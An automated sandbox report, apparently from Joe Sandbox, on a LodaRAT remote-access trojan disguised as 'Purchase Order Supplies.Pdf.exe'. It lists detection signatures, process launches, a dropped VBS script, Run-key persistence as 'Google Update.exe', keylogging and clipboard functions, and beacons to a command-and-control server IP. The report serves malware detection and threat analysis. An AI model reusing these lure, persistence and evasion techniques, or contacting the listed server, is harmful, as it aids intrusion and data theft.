Windows Analysis Report
Purchase Order Supplies.Pdf.exe

Overview

General Information

Sample name: Purchase Order Supplies.Pdf.exe
Analysis ID: 1541228
MD5: a842353a8fd25a6b05d0d3ce6afe8aad
SHA1: 453b9aceb8565d9f838e5bbcd8f694d97741ada9
SHA256: 9169a54c077380847a9d8d532fd0e5558d60f881ff6dcc029b2e04c9f9fb8104

Detection

LodaRAT
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for dropped file
Icon mismatch, binary includes an icon from a different legit application in order to fool users
Sigma detected: Suspicious Double Extension File Execution
Suricata IDS alerts for network traffic
Yara detected LodaRAT
AI detected suspicious sample
Initial sample is a PE file and has a suspicious name
Machine Learning detection for dropped file
Machine Learning detection for sample
Sigma detected: Potentially Suspicious Malware Callback Communication
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Uses an obfuscated file name to hide its real file extension (double extension)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Sleep loop found (likely to delay execution)
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara detected ProcessChecker

Classification

  • System is w10x64_ra
  • Purchase Order Supplies.Pdf.exe (PID: 7036 cmdline: "C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exe" MD5: A842353A8FD25A6B05D0D3CE6AFE8AAD)
    • wscript.exe (PID: 6900 cmdline: WSCript C:\Users\user\AppData\Local\Temp\KKRBIX.vbs MD5: FF00E0480075B095948000BDC66E81F0)
  • cleanup
Name: Loda, LodaRAT
Description: Loda is a previously undocumented AutoIT malware with a variety of capabilities for spying on victims. Proofpoint first observed Loda in September of 2016 and it has since grown in popularity. The name Loda is derived from a directory to which the malware author chose to write keylogger logs. It should be noted that some antivirus products currently detect Loda as Trojan.Nymeria, although the connection is not well-documented.
Attribution: No Attribution
Blogpost URLs:
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.loda
No configs have been found
Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Local\Temp\KKRBIX.vbs | JoeSecurity_ProcessChecker | Yara detected ProcessChecker | Joe Security |
00000003.00000002.2476240013.0000000003460000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_ProcessChecker | Yara detected ProcessChecker | Joe Security |
00000003.00000002.2471256103.00000000030F7000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_ProcessChecker | Yara detected ProcessChecker | Joe Security |
00000003.00000002.2471256103.00000000030D8000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_ProcessChecker | Yara detected ProcessChecker | Joe Security |
00000001.00000002.2485820292.0000000004D11000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_ProcessChecker | Yara detected ProcessChecker | Joe Security |
Process Memory Space: Purchase Order Supplies.Pdf.exe PID: 7036 | JoeSecurity_ProcessChecker | Yara detected ProcessChecker | Joe Security |

System Summary

Source: Process started; Author: Florian Roth (Nextron Systems), @blu3_team (idea), Nasreddine Bencherchali (Nextron Systems); Data: Command: "C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exe", CommandLine: "C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exe", CommandLine|base64offset|contains: :^, Image: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exe, NewProcessName: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exe, OriginalFileName: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4380, ProcessCommandLine: "C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exe", ProcessId: 7036, ProcessName: Purchase Order Supplies.Pdf.exe
Source: Network Connection; Author: Florian Roth (Nextron Systems); Data: DestinationIp: 172.111.138.100, DestinationIsIpv6: false, DestinationPort: 5552, EventID: 3, Image: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exe, Initiated: true, ProcessId: 7036, Protocol: tcp, SourceIp: 192.168.2.16, SourceIsIpv6: false, SourcePort: 49708
Source: Process started; Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems); Data: Command: WSCript C:\Users\user\AppData\Local\Temp\KKRBIX.vbs, CommandLine: WSCript C:\Users\user\AppData\Local\Temp\KKRBIX.vbs, CommandLine|base64offset|contains: Y , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exe", ParentImage: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exe, ParentProcessId: 7036, ParentProcessName: Purchase Order Supplies.Pdf.exe, ProcessCommandLine: WSCript C:\Users\user\AppData\Local\Temp\KKRBIX.vbs, ProcessId: 6900, ProcessName: wscript.exe
Source: Process started; Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton; Data: Command: WSCript C:\Users\user\AppData\Local\Temp\KKRBIX.vbs, CommandLine: WSCript C:\Users\user\AppData\Local\Temp\KKRBIX.vbs, CommandLine|base64offset|contains: Y , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exe", ParentImage: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exe, ParentProcessId: 7036, ParentProcessName: Purchase Order Supplies.Pdf.exe, ProcessCommandLine: WSCript C:\Users\user\AppData\Local\Temp\KKRBIX.vbs, ProcessId: 6900, ProcessName: wscript.exe
Source: Process started; Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community; Data: Command: WSCript C:\Users\user\AppData\Local\Temp\KKRBIX.vbs, CommandLine: WSCript C:\Users\user\AppData\Local\Temp\KKRBIX.vbs, CommandLine|base64offset|contains: Y , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exe", ParentImage: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exe, ParentProcessId: 7036, ParentProcessName: Purchase Order Supplies.Pdf.exe, ProcessCommandLine: WSCript C:\Users\user\AppData\Local\Temp\KKRBIX.vbs, ProcessId: 6900, ProcessName: wscript.exe
Source: Registry Key set; Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split); Data: Details: "C:\Users\user\AppData\Roaming\Windata\Google Update.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exe, ProcessId: 7036, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\KKRBIX
Source: Process started; Author: Michael Haag; Data: Command: WSCript C:\Users\user\AppData\Local\Temp\KKRBIX.vbs, CommandLine: WSCript C:\Users\user\AppData\Local\Temp\KKRBIX.vbs, CommandLine|base64offset|contains: Y , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exe", ParentImage: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exe, ParentProcessId: 7036, ParentProcessName: Purchase Order Supplies.Pdf.exe, ProcessCommandLine: WSCript C:\Users\user\AppData\Local\Temp\KKRBIX.vbs, ProcessId: 6900, ProcessName: wscript.exe
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-24T15:38:30.424583+0200 | 2822116 | 1 | Malware Command and Control Activity Detected | 192.168.2.16 | 49708 | 172.111.138.100 | 5552 | TCP
2024-10-24T15:39:34.363167+0200 | 2822116 | 1 | Malware Command and Control Activity Detected | 192.168.2.16 | 49716 | 172.111.138.100 | 5552 | TCP
2024-10-24T15:38:16.421517+0200 | 2849885 | 1 | Malware Command and Control Activity Detected | 192.168.2.16 | 49714 | 172.111.138.100 | 5552 | TCP
2024-10-24T15:38:16.421517+0200 | 2849885 | 1 | Malware Command and Control Activity Detected | 192.168.2.16 | 49716 | 172.111.138.100 | 5552 | TCP
2024-10-24T15:38:16.421517+0200 | 2849885 | 1 | Malware Command and Control Activity Detected | 192.168.2.16 | 49708 | 172.111.138.100 | 5552 | TCP
2024-10-24T15:38:16.421517+0200 | 2849885 | 1 | Malware Command and Control Activity Detected | 192.168.2.16 | 49715 | 172.111.138.100 | 5552 | TCP
2024-10-24T15:38:16.421517+0200 | 2849885 | 1 | Malware Command and Control Activity Detected | 192.168.2.16 | 49711 | 172.111.138.100 | 5552 | TCP
2024-10-24T15:38:16.421517+0200 | 2849885 | 1 | Malware Command and Control Activity Detected | 192.168.2.16 | 49713 | 172.111.138.100 | 5552 | TCP
2024-10-24T15:38:16.421517+0200 | 2849885 | 1 | Malware Command and Control Activity Detected | 192.168.2.16 | 49710 | 172.111.138.100 | 5552 | TCP
2024-10-24T15:38:30.424583+0200 | 2849885 | 1 | Malware Command and Control Activity Detected | 192.168.2.16 | 49708 | 172.111.138.100 | 5552 | TCP
2024-10-24T15:38:39.694626+0200 | 2849885 | 1 | Malware Command and Control Activity Detected | 192.168.2.16 | 49709 | 172.111.138.100 | 5552 | TCP
2024-10-24T15:38:40.772870+0200 | 2849885 | 1 | Malware Command and Control Activity Detected | 192.168.2.16 | 49709 | 172.111.138.100 | 5552 | TCP
2024-10-24T15:38:48.781841+0200 | 2849885 | 1 | Malware Command and Control Activity Detected | 192.168.2.16 | 49710 | 172.111.138.100 | 5552 | TCP
2024-10-24T15:38:57.814205+0200 | 2849885 | 1 | Malware Command and Control Activity Detected | 192.168.2.16 | 49711 | 172.111.138.100 | 5552 | TCP
2024-10-24T15:39:06.899902+0200 | 2849885 | 1 | Malware Command and Control Activity Detected | 192.168.2.16 | 49713 | 172.111.138.100 | 5552 | TCP
2024-10-24T15:39:16.326030+0200 | 2849885 | 1 | Malware Command and Control Activity Detected | 192.168.2.16 | 49714 | 172.111.138.100 | 5552 | TCP
2024-10-24T15:39:25.332704+0200 | 2849885 | 1 | Malware Command and Control Activity Detected | 192.168.2.16 | 49715 | 172.111.138.100 | 5552 | TCP
2024-10-24T15:39:34.363167+0200 | 2849885 | 1 | Malware Command and Control Activity Detected | 192.168.2.16 | 49716 | 172.111.138.100 | 5552 | TCP

AV Detection

Source: C:\Users\user\AppData\Local\Temp\KKRBIX.vbs; Avira: detection malicious, Label: VBS/Runner.VPJI
Source: Submited Sample; Integrated Neural Analysis Model: Matched 99.1% probability
Source: C:\Users\user\AppData\Roaming\Windata\Google Update.exe; Joe Sandbox ML: detected
Source: Purchase Order Supplies.Pdf.exe; Joe Sandbox ML: detected
Source: Purchase Order Supplies.Pdf.exe; Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exe; Code function: 1_2_00CADD92 GetFileAttributesW,FindFirstFileW,FindClose
Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exe; Code function: 1_2_00CE2044 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exe; Code function: 1_2_00CE219F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exe; Code function: 1_2_00CE24A9 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose
Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exe; Code function: 1_2_00CD6B3F _wcscat,_wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exe; Code function: 1_2_00CD6E4A _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose
Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exe; Code function: 1_2_00CDF350 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose
Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exe; Code function: 1_2_00CDFDD2 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf
Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exe; Code function: 1_2_00CDFD47 FindFirstFileW,FindClose

Networking

Source: Network traffic; Suricata IDS: 2822116 - Severity 1 - ETPRO MALWARE Loda Logger CnC Beacon : 192.168.2.16:49708 -> 172.111.138.100:5552
Source: Network traffic; Suricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.16:49711 -> 172.111.138.100:5552
Source: Network traffic; Suricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.16:49708 -> 172.111.138.100:5552
Source: Network traffic; Suricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.16:49715 -> 172.111.138.100:5552
Source: Network traffic; Suricata IDS: 2822116 - Severity 1 - ETPRO MALWARE Loda Logger CnC Beacon : 192.168.2.16:49716 -> 172.111.138.100:5552
Source: Network traffic; Suricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.16:49710 -> 172.111.138.100:5552
Source: Network traffic; Suricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.16:49716 -> 172.111.138.100:5552
Source: Network traffic; Suricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.16:49714 -> 172.111.138.100:5552
Source: Network traffic; Suricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.16:49709 -> 172.111.138.100:5552
Source: Network traffic; Suricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.16:49713 -> 172.111.138.100:5552
Source: Joe Sandbox View; ASN Name: VOXILITYGB VOXILITYGB
Source: unknown; TCP traffic detected without corresponding DNS query: 172.111.138.100
Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exe; Code function: 1_2_00CE550C InternetReadFile,InternetQueryDataAvailable,InternetReadFile
Source: Purchase Order Supplies.Pdf.exe, 00000001.00000002.2485288040.0000000004CA6000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://ip-score.com/checkip/:
Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exe; Code function: 1_2_00CE7099 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard
Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exe; Code function: 1_2_00CE7294 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard
Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exe; Code function: 1_2_00CD4342 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput
Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exe; Code function: 1_2_00CFF5D0 NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW

System Summary

Source: initial sample; Static PE information: Filename: Purchase Order Supplies.Pdf.exe
Source: C:\Windows\SysWOW64\wscript.exe; COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
Source: C:\Windows\SysWOW64\wscript.exe; COM Object queried: WBEM Locator HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}
Source: C:\Windows\SysWOW64\wscript.exe; COM Object queried: Windows Management and Instrumentation HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}
Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exe; Code function: 1_2_00C929C2 NtdllDefWindowProc_W,KillTimer,SetTimer,RegisterClipboardFormatW,CreatePopupMenu,PostQuitMessage,SetFocus,MoveWindow
Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exe; Code function: 1_2_00D002AA NtdllDialogWndProc_W
Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exe; Code function: 1_2_00CFE769 NtdllDialogWndProc_W,CallWindowProcW
Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exe; Code function: 1_2_00CFEAA6 ReleaseCapture,SetWindowTextW,SendMessageW,NtdllDialogWndProc_W
Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exe; Code function: 1_2_00CFEA4E NtdllDialogWndProc_W
Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exe; Code function: 1_2_00CAAC99 NtdllDialogWndProc_W
Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exe; Code function: 1_2_00CFECBC PostMessageW,GetFocus,GetDlgCtrlID,_memset,GetMenuItemInfoW,GetMenuItemCount,GetMenuItemID,GetMenuItemInfoW,GetMenuItemInfoW,CheckMenuRadioItem,NtdllDialogWndProc_W
Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exe; Code function: 1_2_00CAAD5C NtdllDialogWndProc_W,7479C8D0,NtdllDialogWndProc_W
Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exe; Code function: 1_2_00CFEFA8 GetCursorPos,TrackPopupMenuEx,GetCursorPos,NtdllDialogWndProc_W
Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exe; Code function: 1_2_00CAAFB4 GetParent,NtdllDialogWndProc_W
Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exe; Code function: 1_2_00CFF0A1 SendMessageW,NtdllDialogWndProc_W
Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exe; Code function: 1_2_00CFF122 DragQueryPoint,SendMessageW,DragQueryFileW,DragQueryFileW,_wcscat,SendMessageW,SendMessageW,SendMessageW,SendMessageW,DragFinish,NtdllDialogWndProc_W
Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exe; Code function: 1_2_00CFF3DA NtdllDialogWndProc_W
Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exe; Code function: 1_2_00CFF3AB NtdllDialogWndProc_W
Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exe; Code function: 1_2_00CFF37C NtdllDialogWndProc_W
Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exe; Code function: 1_2_00CFF45A ClientToScreen,NtdllDialogWndProc_W
Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exe; Code function: 1_2_00CFF425 NtdllDialogWndProc_W
Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exe; Code function: 1_2_00CFF594 GetWindowLongW,NtdllDialogWndProc_W
Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exe; Code function: 1_2_00CAB7F2 NtdllDialogWndProc_W
Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exe; Code function: 1_2_00CAB845 NtdllDialogWndProc_W
Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exe; Code function: 1_2_00CFFE80 NtdllDialogWndProc_W
Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exe; Code function: 1_2_00CFFF91 GetSystemMetrics,MoveWindow,SendMessageW,InvalidateRect,SendMessageW,ShowWindow,NtdllDialogWndProc_W
Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exe; Code function: 1_2_00CFFF04 GetClientRect,GetCursorPos,ScreenToClient,NtdllDialogWndProc_W
Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exe; Code function: 1_2_00CD70AE: CreateFileW,DeviceIoControl,CloseHandle
Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exe; Code function: 1_2_00CCB9F1 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,74DE5590,CreateProcessAsUserW,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle
Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exe; Code function: 1_2_00CD82D0 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exe, Code function: String function: 00CB7750 appears 42 times
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exe, Code function: String function: 00CAF885 appears 68 times
              Source: Purchase Order Supplies.Pdf.exe, Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
              Source: classification engine, Classification label: mal100.troj.evad.winEXE@3/2@0/1
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exe, Code function: 1_2_00CDD712 GetLastError, FormatMessageW
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exe, Code function: 1_2_00CCB8B0 AdjustTokenPrivileges, CloseHandle
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exe, Code function: 1_2_00CCBEC3 LookupPrivilegeValueW, AdjustTokenPrivileges, GetLastError
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exe, Code function: 1_2_00CDEA85 SetErrorMode, GetDiskFreeSpaceExW, SetErrorMode
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exe, Code function: 1_2_00CD6F5B CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, __wsplitpath, _wcscat, CloseHandle
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exe, Code function: 1_2_00CEC604 CoInitializeSecurity, _memset, _memset, CoCreateInstanceEx, CoTaskMemFree, CoSetProxyBlanket
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exe, Code function: 1_2_00C931F2 CreateStreamOnHGlobal, FindResourceExW, LoadResource, SizeofResource, LockResource
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exe, File created: C:\Users\user\AppData\Roaming\Windata
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exe, File created: C:\Users\user\AppData\Local\Temp\KKRBIX.vbs
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exe, Process created: C:\Windows\SysWOW64\wscript.exe WSCript C:\Users\user\AppData\Local\Temp\KKRBIX.vbs
              Source: C:\Windows\SysWOW64\wscript.exe, WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
